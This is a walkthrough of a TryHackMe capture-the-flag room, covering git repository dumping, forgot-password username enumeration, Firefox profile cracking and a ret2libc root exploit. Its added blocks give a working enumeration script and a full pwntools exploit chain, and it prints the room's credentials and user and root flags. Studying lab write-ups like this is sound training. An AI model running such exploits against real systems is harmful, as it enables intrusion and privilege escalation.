[Chronicle] - TryHackMe - Walkthrough

As usual, we start by mapping the services exposed on the host with an nmap version scan.

Nmap scan report for 10.10.159.96
Host is up, received echo-reply ttl 61 (0.17s latency).
Scanned at 2022-05-22 03:22:39 EDT for 24s
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b2:4c:49:da:7c:9a:3a:ba:6e:59:46:c2:a9:e6:a2:35 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDELanAivcbXHH+RqBWDQUmT0TJPTzxJ4XOLkZ4hQYAYCUXQ25C24k6ijW6MnKiImF9m9CoMdlzXIAC/DYArGJu+q5L68V1SAaqtS5YljXGb517Qi4ixekjaLua9Z+Du00c0nGWC46WA+JCjI6UP8FlTyNONXJ4Wv8T7ZA6T8rTrWZWd6dSTIKaZaN8fsD31cIJMuX2whX8IczzwzFuxp2ucPLJ0IwpoiX3ubuqUz4kkNi8FI5T2hweqqygLPmdA8AySZrIbmC4AusmmHwSf99aUHXjZ5Z6fHbHAwH0dsGDFaDvHuVFEp4l1h9TpZiKghUllDx9+6eRyKprJMpfvXZ1
|   256 7a:3e:30:70:cf:32:a4:f2:0a:cb:2b:42:08:0c:19:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPxb2LHHqkJNa+RUETb+7kg2rLKG3IxkiOZnG3YP7R5hd2KqQC1eJL1UyHcBKdOYrFllM43rkqfDVSxtm2f/ivc=
|   256 4f:35:e1:33:96:84:5d:e5:b3:75:7d:d8:32:18:e0:a8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPwYIfNblUpR0Hf/77s33mZq1OUXZD4jQacBQBwiLapr
80/tcp   open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
8081/tcp open  http    syn-ack ttl 61 Werkzeug httpd 1.0.1 (Python 3.6.9)
| http-methods: 
|_  Supported Methods: HEAD GET OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

Port 80 appears to show nothing at first; the page just says "old". Directory brute forcing and further enumeration turn up a subdirectory also named /old, which holds a file named note.txt and two further subdirectories, /old/templates and /old/.git.

I went ahead and used git-dumper to pull the repository down for analysis. An exposed .git directory is always worth grabbing: it gives you the full history, not just the files currently served, and you can often find passwords and other useful hints in it, if not in the changed files themselves then in the commit messages; it always depends. Note also that the /old/templates directory looks exactly like the content served on port 8081.

[Screenshot: wuzz view of the /old/templates subdirectory]

Next I run git log -p on the repository to see what has changed over time, basically digging through everything, and unfortunately we page through several CSS files before we get to some Python code. The Werkzeug banner on port 8081 points to a Flask app rather than Django, but the layout is similar either way.

[Screenshot: git log -p output showing the Python source]
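Paging through CSS diffs by hand is where most people lose patience, so here is a small scanner, added as an example and not part of the original walkthrough, that walks git log -p output and flags added or removed lines that look like credential assignments or 32-character hex tokens (the size of the key found on this box). The keyword list, the skipped file extensions and the sample diff text are my own constructions for illustration; point scan_repo at the dumped repository to run it for real.

```python
import re
import subprocess

# Heuristics (assumed, tune to taste): password-ish assignments and 32-hex-char tokens
SECRET_ASSIGN = re.compile(
    r"""(?i)\b(pass(word)?|passwd|pwd|secret|api[_-]?key|token|key)\b\s*[=:]\s*['"]?([^\s'"]+)""")
HEX32 = re.compile(r"\b[0-9a-f]{32}\b")

# Files that are mostly noise in a git history dump
SKIP_SUFFIXES = (".css", ".scss", ".svg", ".png", ".jpg", ".min.js")


def scan_diff_text(diff_text):
    """Walk `git log -p` output and return (commit, file, line) for suspicious +/- lines."""
    hits = []
    commit = None
    path = None
    skip = False
    for line in diff_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ ") or line.startswith("--- "):
            target = line[4:]
            if target.startswith(("a/", "b/")):
                target = target[2:]
            if target != "/dev/null":
                path = target
                skip = path.endswith(SKIP_SUFFIXES)
        elif line[:1] in ("+", "-") and not line.startswith(("+++", "---")) and not skip:
            body = line[1:]
            if SECRET_ASSIGN.search(body) or HEX32.search(body):
                hits.append((commit, path, body.strip()))
    return hits


def scan_repo(repo_dir):
    """Run git log -p --all on a checked-out (or git-dumper reconstructed) repository."""
    out = subprocess.run(["git", "-C", repo_dir, "log", "-p", "--all"],
                         capture_output=True, text=True, check=True).stdout
    return scan_diff_text(out)


# Constructed sample diff, in the shape git log -p emits, for an offline demonstration
SAMPLE_DIFF = """commit 1111111111111111111111111111111111111111
Author: dev <dev@example.invalid>

    add login

diff --git a/app.py b/app.py
--- a/app.py
+++ b/app.py
@@ -1,3 +1,6 @@
 import flask
+API_KEY = "7454c262d0d5a3a0c0b678d6c0dbc7ef"
+if user == "admin" and password == "password":
+    return redirect("/dash")
diff --git a/static/style.css b/static/style.css
--- a/static/style.css
+++ b/static/style.css
@@ -1 +1,2 @@
 body { color: #fff }
+.key { background: #aabbccddeeff00112233445566778899 }
"""

if __name__ == "__main__":
    for commit, path, text in scan_diff_text(SAMPLE_DIFF):
        print(f"{commit[:8]} {path}: {text}")
```

The stylesheet line carries a 32-hex-character token too but is skipped by file type, which is exactly the noise you want out of the way; if you suspect someone hid a key in an asset, drop the suffix filter.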

So far, all we've found is a set of default credentials and what might be an API key. Since there's no login page on port 80, we jump back over to port 8081. Sometimes you can skip all of this by just trying default creds; I understand that if admin:password hasn't worked the last 100 times you assume it won't this time, but people who make a mistake like using admin:password make plenty of other mistakes that are just itching to be exploited. Do copy down '7454c262d0d5a3a0c0b678d6c0dbc7ef', though; that is not something you will recall from memory.

Now the login button isn't doing anything, so eventually I just start trying everything. I click the forgot password button and get a very strange page with a cartoon image of a woman asking for my username and promising to provide my password. I try admin and get nothing out of her. So I load up Burp, getting ready to hammer some of these requests and disable some JavaScript, and I notice a response asking us for an API key (of course), which we are sending as null.

[Screenshot: forgot-password response complaining that no API key was supplied]

So we throw our API key in, but we're still stuck: now we don't know the username. Since we have to send that JSON body anyway, I decide to keep using Burp to brute force it, but any tool that lets you send a data string of {"key":"7454c262d0d5a3a0c0b678d6c0dbc7ef"} will do, which is most of them. I quickly find the username 'tommy' and the server returns his password as promised. The real bug here is a forgot-password endpoint that hands out a user's password on the strength of a static key; the enumeration just tells you which username to ask for.
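The same enumeration without Burp, as an added example that is not part of the original walkthrough: POST the recovered key plus a candidate username as JSON, baseline the response for a username that cannot exist, and report the first candidate that answers differently. The endpoint path, the "username" field name and the candidate list are assumptions (take the real path and field from the request Burp captured); the send function is injectable so the logic can be exercised offline against a fake server.

```python
import json
import urllib.error
import urllib.request

API_KEY = "7454c262d0d5a3a0c0b678d6c0dbc7ef"            # recovered from the git history
TARGET = "http://10.10.159.96:8081/forgot"              # ASSUMED path; take the real one from Burp
CANDIDATES = ["admin", "root", "user", "dev", "tommy", "carl"]   # constructed wordlist


def build_payload(username, key=API_KEY):
    # "key" is the field the server complained about; "username" is an ASSUMED field name
    return json.dumps({"key": key, "username": username}).encode()


def http_send(payload, url=TARGET):
    """POST the JSON body and return (status, body). HTTP error codes are data here, not failures."""
    req = urllib.request.Request(url, data=payload, method="POST",
                                 headers={"Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


def find_username(candidates, send=http_send, key=API_KEY):
    """Baseline the 'no such user' reply, then return (name, body) for the first candidate
    that produces a different (status, body) pair, or None if nothing stands out."""
    baseline = send(build_payload("no-such-user-zz9", key))
    for name in candidates:
        reply = send(build_payload(name, key))
        if reply != baseline:
            return name, reply[1]
    return None


if __name__ == "__main__":
    hit = find_username(CANDIDATES)
    print(hit if hit else "no username produced a different response")
```

Diffing against a baseline rather than looking for a fixed string means the loop still works when the application changes its wording, and a wrong key shows up immediately as every candidate matching the baseline.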

I tried tommy:DevMakesStuff01 with a manually crafted POST request, but still got nothing out of the login page. So I moved over to SSH and tried the credentials there; sure enough, we're in and we have our user flag: 7ba840222ecbdb57af4d24eb222808ad

Now we can move on to the easy part. The next user over, 'carlJ', has a hidden .mozilla folder with some Firefox profiles in it. So I pop over to my toolshed and use sshfs to mount his profiles for cracking. The profiles turn out to be protected by a master password as well, so we attack them with a brute forcer and they break quickly to 'password1'.

We're almost there. We log in as carlJ and find a binary in the mailing folder (smail). This binary is owned by root, so it's clear what we need to exploit (for a root shell to come out of it, it also has to be setuid root; check with ls -l). Some quick analysis shows it's vulnerable to a stack overflow that can be turned into ret2libc, so we bust out pwntools and overflow the binary.
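Since the page does not show the exploit, here is the shape of a two-stage ret2libc against a setuid binary, added as an example and not the original walkthrough's script. Every address, offset and I/O detail about smail below is an assumption for illustration (x86-64, NX on, no canary, input read from stdin, 72 bytes to the saved return address, a pop rdi gadget in the binary, libc offsets for the box's own libc): stage one calls puts(puts@got) to leak a libc pointer and returns to main, stage two returns into system("/bin/sh"). The chain builders and leak parsing use only the standard library so they can be checked offline; only exploit() needs pwntools.

```python
import struct

# ASSUMED target facts; recover the real ones with a cyclic pattern, ROPgadget/ropper and readelf
BINARY   = "/home/carlJ/mailing/smail"   # assumed path
OFFSET   = 72                            # assumed bytes until the saved return address
POP_RDI  = 0x4011d3                      # assumed 'pop rdi; ret' in the binary
RET      = 0x40101a                      # assumed lone 'ret' for 16-byte stack alignment
PUTS_PLT = 0x401030                      # assumed
PUTS_GOT = 0x404018                      # assumed
MAIN     = 0x401136                      # assumed

# ASSUMED offsets inside the box's libc (readelf -s / strings -tx on that exact file, never a guess)
LIBC_PUTS   = 0x80aa0
LIBC_SYSTEM = 0x4f4e0
LIBC_BINSH  = 0x1b40fa


def p64(value):
    return struct.pack("<Q", value)


def leak_chain():
    """Stage 1: puts(puts@got) prints a libc address, then main runs again for a second input."""
    return b"A" * OFFSET + p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN)


def parse_leak(output_after_payload):
    """puts stops at the first NUL, so a user-space pointer arrives as 6 bytes; pad to 8."""
    raw = output_after_payload[:6]
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def libc_base(leaked_puts):
    base = leaked_puts - LIBC_PUTS
    # A real libc base is page aligned; anything else means a wrong offset or the wrong libc build
    if (base & 0xfff) != 0:
        raise ValueError("leak does not give a page-aligned base: check LIBC_PUTS")
    return base


def shell_chain(base):
    """Stage 2: the extra ret keeps rsp 16-byte aligned when system() is entered (movaps crash otherwise)."""
    return (b"A" * OFFSET + p64(RET) + p64(POP_RDI) + p64(base + LIBC_BINSH)
            + p64(base + LIBC_SYSTEM))


def exploit():
    """Drive both stages with pwntools, as the walkthrough does. ASSUMES the leaked pointer is the
    first line printed after our input; adjust the recv calls to the program's real prompts."""
    from pwn import process          # imported here so the helpers above work without pwntools
    io = process(BINARY)
    io.sendline(leak_chain())
    base = libc_base(parse_leak(io.recvline()))
    io.sendline(shell_chain(base))
    io.interactive()


if __name__ == "__main__":
    exploit()
```

If the binary is setuid but the shell you land in is not root, bash dropped the effective uid; call system("/bin/sh -p") or setuid(0) first, or use a libc whose /bin/sh string is paired with a setuid call in the chain.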

And, you're done!

Task 1  Challenge
Part of Incognito 2.0 CTF

Like my work, Follow on Twitter to be updated and know more about my work! (@0cirius0)

Answer the questions below

user.txt
7ba840222ecbdb57af4d24eb222808ad

root.txt
f21979de76c0302154cc001884143ab2
